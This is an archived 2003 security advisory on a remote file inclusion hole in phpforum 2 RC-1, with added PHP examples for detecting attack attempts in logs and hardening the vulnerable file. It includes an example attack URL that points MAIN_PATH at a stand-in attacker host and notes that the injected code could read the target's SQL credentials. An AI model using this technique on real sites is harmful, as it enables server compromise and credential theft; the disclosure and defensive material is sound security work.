PHP-Include-Hack-Possibility in phpforum 2 RC-1

From: theblacksheep (theblacksheepat_private)
Date: Thu Jul 10 2003 - 09:56:09 PDT

     ================================================
    <------------------------------------------------>
    <------------#www.bright-shadows.net#------------>
    <------------------------------------------------>
    <--------------#theblacksheep&erik#-------------->
    <------------------------------------------------>
     ================================================
    
    Advisory Information
    --------------------
    Advisory Name      : PHP-Include-Hack-Possibility in phpforum 2 RC-1
    Author             : Marc Bromm <theblacksheepat_private> Germany
    Discovered by      : Marc Bromm <theblacksheepat_private> Germany
    Release Date       : 10 July 2003
    Application        : phpforum 2 RC-1
    Vendor Homepage    : http://www.phpmyforum.de/
    Vendor Status      : notified
    Vulnerable Versions: phpforum 2 RC-1 (maybe older)
    Platforms          : OS Independent, PHP
    Severity           : High
    
    ######Overview:
    
    phpforum is a MySQL-based forum with a large number of features.
    
    ######Exploit:
    
    1. Exploitable file
    
    The exploitable file is "mainfile.php". Its first two lines are:
    
    ----------------------------------------
    <?php
    include("$MAIN_PATH/config.php");    // Configuration
    ----------------------------------------
    
    Because the include path is built directly from the variable $MAIN_PATH, a request can set it to any value, including a URL on another host.
    For example:
    
    -> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com
    
    An attacker then needs only a "config.php" file on that host containing the code to execute; for example, it could read the SQL server username and password stored in the target's "config.inc.php" file.
    Note that the attacking web server (evilhost) must not itself execute PHP, or the code will run on the attacking machine rather than on the target machine.
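The pattern described above (a request parameter carrying a URL where the script expects a local directory) is easy to spot in web server access logs. The following is an added example, not code from the advisory or from phpforum: it scans Common Log Format lines for requests that pass MAIN_PATH as a remote URL. The log lines are constructed samples; the IP addresses are placeholders and the hostnames are the ones used in the advisory.

```php
<?php
// Added example (not from the advisory or from phpforum): detect requests
// that try to make include() fetch a remote file by passing a URL as the
// MAIN_PATH parameter. Log lines below are constructed samples in Common
// Log Format; IPs are placeholders, hostnames are those from the advisory.

$sample_log = array(
    '10.0.0.5 - - [10/Jul/2003:09:56:09 -0700] "GET /forum/mainfile.php?MAIN_PATH=http://www.attack.com HTTP/1.0" 200 512',
    '10.0.0.6 - - [10/Jul/2003:09:57:12 -0700] "GET /forum/index.php HTTP/1.0" 200 2048',
    '10.0.0.7 - - [10/Jul/2003:09:58:01 -0700] "GET /forum/mainfile.php?MAIN_PATH=ftp%3A%2F%2Fevilhost HTTP/1.0" 200 512',
);

/**
 * Return the log lines whose request passes $param with a value that,
 * after URL-decoding, starts with a URL scheme (http://, https://,
 * ftp://, ...), i.e. an attempt to turn include() into a remote fetch.
 */
function find_remote_include_attempts(array $lines, $param = 'MAIN_PATH')
{
    $hits = array();
    foreach ($lines as $line) {
        // Extract the request target from the quoted "METHOD target HTTP/x.y" field.
        if (!preg_match('#"[A-Z]+ (\S+) HTTP/[0-9.]+"#', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[1], '?');
        if ($qpos === false) {
            continue;                                   // no query string at all
        }
        parse_str(substr($m[1], $qpos + 1), $params);   // parse_str also URL-decodes values
        if (!isset($params[$param]) || !is_string($params[$param])) {
            continue;
        }
        // A local directory name never starts with "scheme://".
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $params[$param])) {
            $hits[] = $line;
        }
    }
    return $hits;
}

foreach (find_remote_include_attempts($sample_log) as $hit) {
    echo "remote include attempt: $hit\n";
}
```

Decoding the query string before matching matters: the third sample line encodes the URL as `ftp%3A%2F%2Fevilhost`, which a naive search for `http://` in the raw line would miss. Run against real logs, the same function can be fed the parameter names of any other script that builds include paths from variables.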
    
    ######Solution:
    
    Change
    -----------------------------------
    include("$MAIN_PATH/config.php");    // Configuration
    -----------------------------------
    to
    -----------------------------------
    include("config.php");    // Configuration
    -----------------------------------
    because the config file is in the same folder as mainfile.php.
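The one-line change above removes the attacker-controlled variable from the path. As an added example (not phpforum's code and not part of the advisory), the following hardened opening for mainfile.php goes a step further: it anchors the include path to the script's own directory, refuses any request that still tries to supply MAIN_PATH so that old attack attempts show up in the error log, and verifies that the resolved config.php lies inside the application directory. The explanation of why the original line is exploitable (register_globals turning the query parameter into the global $MAIN_PATH, and allow_url_fopen letting include() fetch a URL) is background this example assumes; the advisory itself does not name these settings.

```php
<?php
// Added example (not phpforum's code): a hardened replacement for the first
// lines of mainfile.php. The vulnerable include("$MAIN_PATH/config.php") is
// exploitable because, with register_globals enabled, a request parameter
// named MAIN_PATH becomes the global $MAIN_PATH, and with allow_url_fopen
// enabled include() will happily fetch "http://.../config.php".
// This version never derives the include path from anything a request supplies.

// 1. Anchor the application directory to the location of this script.
//    dirname(__FILE__) works on PHP 4; __DIR__ is the PHP 5.3+ shorthand.
$app_dir = realpath(dirname(__FILE__));

// 2. Make the old attack visible: if a client sends MAIN_PATH at all
//    (query string, form body or cookie, all of which register_globals
//    would have imported), log it and refuse the request instead of
//    silently ignoring it. Design choice for this example, not from the advisory.
if (isset($_GET['MAIN_PATH']) || isset($_POST['MAIN_PATH']) || isset($_COOKIE['MAIN_PATH'])) {
    $client = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'cli';
    error_log('mainfile.php: client-supplied MAIN_PATH rejected from ' . $client);
    header('HTTP/1.0 400 Bad Request');
    exit;
}

// 3. Resolve config.php and confirm it is a regular file inside $app_dir
//    before including it. realpath() returns false for a missing file, so a
//    deleted or misplaced config stops here instead of producing a half-
//    initialised forum.
$config_file = realpath($app_dir . '/config.php');
if ($config_file === false
    || strpos($config_file, $app_dir . DIRECTORY_SEPARATOR) !== 0
    || !is_file($config_file)) {
    error_log('mainfile.php: config.php missing or outside ' . $app_dir);
    exit;
}

include($config_file);    // Configuration
```

The code change should be paired with configuration: `register_globals = Off` stops request parameters from becoming global variables in the first place, and `allow_url_fopen = Off` (or, on PHP 5.2 and later, `allow_url_include = Off`) stops include() from retrieving code over HTTP or FTP even if another script builds a path from user input.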
    
    Greetz to:
    
    Erik, (O_o)oOoOoOo.
    -- 
      
      theblacksheepat_private
    
    -- 
    http://www.fastmail.fm - mmm... Fastmail...
    
    This archive was generated by hypermail 2b30 : Thu Jul 10 2003 - 14:11:53 PDT